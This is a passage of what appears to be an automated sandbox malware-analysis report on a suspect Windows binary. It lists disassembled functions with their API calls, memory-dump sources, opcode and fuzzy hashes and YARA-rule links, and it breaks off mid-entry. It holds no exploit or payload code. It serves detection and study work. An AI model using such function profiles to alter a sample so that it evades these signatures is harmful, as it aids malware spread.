                                        • Opcode Fuzzy Hash: 6f15094e212e5df4f32ed88c2f16961d83fba2a1e5eaf287b478b2f68493b693
                                        • Instruction Fuzzy Hash: C2016DB26096167EF6A126F86CC1FAB669DDF837B8F340329F525A11D2DB708C4055A0
                                        Function 000D1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 000D1A47
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000D1A59
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000D1A6F
                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 000D1A8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 4e3ec460147f41c9f34a68bf0128494709b8ed8fc79c574fdeb8a421bfb216f9
                                        • Instruction ID: ce6f632397c0cbac07c756cfdec05a2645d558c5c60d53588b67c82933a1826d
                                        • Opcode Fuzzy Hash: 4e3ec460147f41c9f34a68bf0128494709b8ed8fc79c574fdeb8a421bfb216f9
                                        • Instruction Fuzzy Hash: 6F110C3AD01219FFEB11DBA9CD85FEDBB78EB04750F200092E604B7290DA716E51DB94
                                        Function 000DE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThreadId.KERNEL32 ref: 000DE1FD
                                        • MessageBoxW.USER32(?,?,?,?), ref: 000DE230
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 000DE246
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 000DE24D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 2880819207-0
                                        • Opcode ID: 969c463a16606a600fc3e6c07d27a03d05e93b8019d8da21a22973704ce53274
                                        • Instruction ID: 031a07037ffa94409ee1c0ec16c8c9a24ea3d147c12f122a043e963c541b8be4
                                        • Opcode Fuzzy Hash: 969c463a16606a600fc3e6c07d27a03d05e93b8019d8da21a22973704ce53274
                                        • Instruction Fuzzy Hash: 9D11DB76904354BBC701AFA8DC05AAF7FADAB45320F14435AF914D7791D6B0DD848BB0
                                        Function 0009D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateThread.KERNEL32(00000000,?,0009CFF9,00000000,00000004,00000000), ref: 0009D218
                                        • GetLastError.KERNEL32 ref: 0009D224
                                        • __dosmaperr.LIBCMT ref: 0009D22B
                                        • ResumeThread.KERNEL32(00000000), ref: 0009D249
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr
                                        • String ID:
                                        • API String ID: 173952441-0
                                        • Opcode ID: 3ed5efc18c86ade25ee64d058d3f79cf5995937a8de2498c896bd1c6a357642a
                                        • Instruction ID: d8413bf63b0499154a59311abe4e17e0e08904e3d26364ee24ac25084f8d653d
                                        • Opcode Fuzzy Hash: 3ed5efc18c86ade25ee64d058d3f79cf5995937a8de2498c896bd1c6a357642a
                                        • Instruction Fuzzy Hash: DE01F936845104BBDF215BA5DC05BEE7B69EF91730F10431AF925961D1CB70C941E6A0
                                        Function 0007600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0007604C
                                        • GetStockObject.GDI32(00000011), ref: 00076060
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0007606A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CreateMessageObjectSendStockWindow
                                        • String ID:
                                        • API String ID: 3970641297-0
                                        • Opcode ID: b2959cd10a60b77b8a92ff45eee417b34a85b801319f5a12c4fca13a4cddcd9a
                                        • Instruction ID: fc6ee0f9d3e804b4f8b31908ae90fcc86a70f427119fbab98c17850a784f7b86
                                        • Opcode Fuzzy Hash: b2959cd10a60b77b8a92ff45eee417b34a85b801319f5a12c4fca13a4cddcd9a
                                        • Instruction Fuzzy Hash: 9B118E72501908BFEF224F94CC44AEB7BA9FF08364F004201FA0952110C776ACA09FD0
                                        Function 00093B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00093B56
                                          • Part of subcall function 00093AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00093AD2
                                          • Part of subcall function 00093AA3: ___AdjustPointer.LIBCMT ref: 00093AED
                                        • _UnwindNestedFrames.LIBCMT ref: 00093B6B
                                        • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00093B7C
                                        • CallCatchBlock.LIBVCRUNTIME ref: 00093BA4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                        • String ID:
                                        • API String ID: 737400349-0
                                        • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction ID: cab8064657d2b93dc2ab0dcd5db967b275b57fe34b9d36f97672417fb0d08ef3
                                        • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                        • Instruction Fuzzy Hash: 4801E932100149BBDF126E95CC46EEB7BAAEF98754F044014FE4896122C736E962EFA0
                                        Function 000A3073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,000713C6,00000000,00000000,?,000A301A,000713C6,00000000,00000000,00000000,?,000A328B,00000006,FlsSetValue), ref: 000A30A5
                                        • GetLastError.KERNEL32(?,000A301A,000713C6,00000000,00000000,00000000,?,000A328B,00000006,FlsSetValue,00112290,FlsSetValue,00000000,00000364,?,000A2E46), ref: 000A30B1
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,000A301A,000713C6,00000000,00000000,00000000,?,000A328B,00000006,FlsSetValue,00112290,FlsSetValue,00000000), ref: 000A30BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 785f67323df9520fde694bf7de3516935f086ad01b70f63f3bedb11787f0b123
                                        • Instruction ID: 9ca390563d53f7d45be574452d6fe89f2db4b5e567fb22bdcaeba003b21e07c6
                                        • Opcode Fuzzy Hash: 785f67323df9520fde694bf7de3516935f086ad01b70f63f3bedb11787f0b123
                                        • Instruction Fuzzy Hash: AA012B32301222ABCB314BF99C54E577BD8AF07BA1B204720F945E7580C731D941CAE0
                                        Function 000D7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 000D747F
                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 000D7497
                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 000D74AC
                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 000D74CA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Type$Register$FileLoadModuleNameUser
                                        • String ID:
                                        • API String ID: 1352324309-0
                                        • Opcode ID: 483b05ccb948630aa7551f863f6afa8d63ce5c977ae284a84b06ae1f7a77e0df
                                        • Instruction ID: 0d24f35504b1517b9815fe90c2e686e48275ef00691da24647d6305052150752
                                        • Opcode Fuzzy Hash: 483b05ccb948630aa7551f863f6afa8d63ce5c977ae284a84b06ae1f7a77e0df
                                        • Instruction Fuzzy Hash: CA118BB1205310ABE7318F14DC08B96BBFCFF00B00F10856AA65AD6691E7B0E944DFA0
                                        Function 000DB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0C4
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0E9
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB0F3
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,000DACD3,?,00008000), ref: 000DB126
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CounterPerformanceQuerySleep
                                        • String ID:
                                        • API String ID: 2875609808-0
                                        • Opcode ID: 299b0719552c65a923a31512603193adf4b62886c98d3fcf1e11855dc3f30989
                                        • Instruction ID: 865b7a0088e05a7024ce730df6ce0ddedcab9a0f8aaa8c85b8c9f9a4688222ae
                                        • Opcode Fuzzy Hash: 299b0719552c65a923a31512603193adf4b62886c98d3fcf1e11855dc3f30989
                                        • Instruction Fuzzy Hash: 30116D31C0162CEBCF10AFE4E9596EEBF78FF09711F524186D981B2281CB7096908BA5
                                        Function 00107E14 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00107E33
                                        • ScreenToClient.USER32(?,?), ref: 00107E4B
                                        • ScreenToClient.USER32(?,?), ref: 00107E6F
                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00107E8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ClientRectScreen$InvalidateWindow
                                        • String ID:
                                        • API String ID: 357397906-0
                                        • Opcode ID: fd3f68d7f707012c96d74301dc084daeecdad777decc1262a36e459bc0051bca
                                        • Instruction ID: c5a70ee51378f62cfda4aa6ebc55743f56166749d03eb4f874cb2b8ae66de339
                                        • Opcode Fuzzy Hash: fd3f68d7f707012c96d74301dc084daeecdad777decc1262a36e459bc0051bca
                                        • Instruction Fuzzy Hash: 111186B9D0024AAFDB41CF98C8849EEBBF5FF08310F104156E951E3650D775AA94CF90
                                        Function 000D2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000D2DC5
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 000D2DD6
                                        • GetCurrentThreadId.KERNEL32 ref: 000D2DDD
                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000D2DE4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: 7b3d6115eecd0be9ee35f2a4501279720df127be14f6b86b8d3511ca073a4aaa
                                        • Instruction ID: 647f48eecc0efe8619d61d1ee62953f1c59d91dd741d06c9e30d985e0b599c85
                                        • Opcode Fuzzy Hash: 7b3d6115eecd0be9ee35f2a4501279720df127be14f6b86b8d3511ca073a4aaa
                                        • Instruction Fuzzy Hash: 94E06D71101324BAD7301B629C0DEEB3E6DFB56BA1F000216B145D16809AE18880CAF0
                                        Function 00108863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00089693
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896A2
                                          • Part of subcall function 00089639: BeginPath.GDI32(?), ref: 000896B9
                                          • Part of subcall function 00089639: SelectObject.GDI32(?,00000000), ref: 000896E2
                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00108887
                                        • LineTo.GDI32(?,?,?), ref: 00108894
                                        • EndPath.GDI32(?), ref: 001088A4
                                        • StrokePath.GDI32(?), ref: 001088B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: ce783551162ae16eeafd437b42c8052939e2273589450400a0770185aa8e6219
                                        • Instruction ID: cc718119825c108bd571e26503f6b05d3172f4a78a06bcfb54da2cb7dab6b6d6
                                        • Opcode Fuzzy Hash: ce783551162ae16eeafd437b42c8052939e2273589450400a0770185aa8e6219
                                        • Instruction Fuzzy Hash: 82F05E3A045258FAEB126F94AC0DFCE3F59AF06310F048101FA91654E2C7B555A1DFE5
                                        Function 000898B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 000898CC
                                        • SetTextColor.GDI32(?,?), ref: 000898D6
                                        • SetBkMode.GDI32(?,00000001), ref: 000898E9
                                        • GetStockObject.GDI32(00000005), ref: 000898F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Color$ModeObjectStockText
                                        • String ID:
                                        • API String ID: 4037423528-0
                                        • Opcode ID: f879c85cddf42c33ded04a57e70e227d6a2c1de57b0eb6ab60811894f207796c
                                        • Instruction ID: c85ef3ff8a060d043d48ac906b21157e252414b70e5bf98b9f8edabea45800f9
                                        • Opcode Fuzzy Hash: f879c85cddf42c33ded04a57e70e227d6a2c1de57b0eb6ab60811894f207796c
                                        • Instruction Fuzzy Hash: 3AE06D31244680EEDB215B78AC09BEC3F61AB52336F04C319FAFA584E1C3B146909F50
                                        Function 000D162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentThread.KERNEL32 ref: 000D1634
                                        • OpenThreadToken.ADVAPI32(00000000,?,?,?,000D11D9), ref: 000D163B
                                        • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,000D11D9), ref: 000D1648
                                        • OpenProcessToken.ADVAPI32(00000000,?,?,?,000D11D9), ref: 000D164F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CurrentOpenProcessThreadToken
                                        • String ID:
                                        • API String ID: 3974789173-0
                                        • Opcode ID: 657427db73ac90c017caac371fd5865479edba529f2b6983aa10c90021ec25d2
                                        • Instruction ID: 6d0430688d75f95a894f4c61fa899d1d2b13a0f7b9e80f1cf8e19a50040ceed5
                                        • Opcode Fuzzy Hash: 657427db73ac90c017caac371fd5865479edba529f2b6983aa10c90021ec25d2
                                        • Instruction Fuzzy Hash: B8E08635601311EBE7601FA09D0DB873BBDAF54791F14C909F285C9480DAB48480CFA0
                                        Function 000CD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 000CD858
                                        • GetDC.USER32(00000000), ref: 000CD862
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000CD882
                                        • ReleaseDC.USER32(?), ref: 000CD8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 9e4280625f843b7b27c7e6da0aa0273116fbd76c47832add5e50c2229b76383c
                                        • Instruction ID: 12f5f4e431d0aed195358c950eba9971d978a7526d9c846897a0175433c822cd
                                        • Opcode Fuzzy Hash: 9e4280625f843b7b27c7e6da0aa0273116fbd76c47832add5e50c2229b76383c
                                        • Instruction Fuzzy Hash: 6BE01AB4800204DFCF61AFA0D808A6DBBB1FB08310F20C119F88AE7750CB798981AF90
                                        Function 000CD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDesktopWindow.USER32 ref: 000CD86C
                                        • GetDC.USER32(00000000), ref: 000CD876
                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 000CD882
                                        • ReleaseDC.USER32(?), ref: 000CD8A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 18796b987172fbfe658e0a7804a796739bcc94d699e653faba5d8fc7989fed28
                                        • Instruction ID: fd54f01ca811955978b48a73af66c15860c2b5fa776592b36a298efdeaedbad0
                                        • Opcode Fuzzy Hash: 18796b987172fbfe658e0a7804a796739bcc94d699e653faba5d8fc7989fed28
                                        • Instruction Fuzzy Hash: 5BE09A75C00204DFCF61AFA0D80866DBBB5BB08311F14C559F98AE7750CB7959419F90
                                        Function 000E4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00077620: _wcslen.LIBCMT ref: 00077625
                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 000E4ED4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Connection_wcslen
                                        • String ID: *$LPT
                                        • API String ID: 1725874428-3443410124
                                        • Opcode ID: 060f427c3cbec99be2535618e46ede1a7391c513f3d70c489905815c26d86e08
                                        • Instruction ID: 40a9c7eac646847083e5c0db9e434afb0ca8ba5831069355196e096c58dd5912
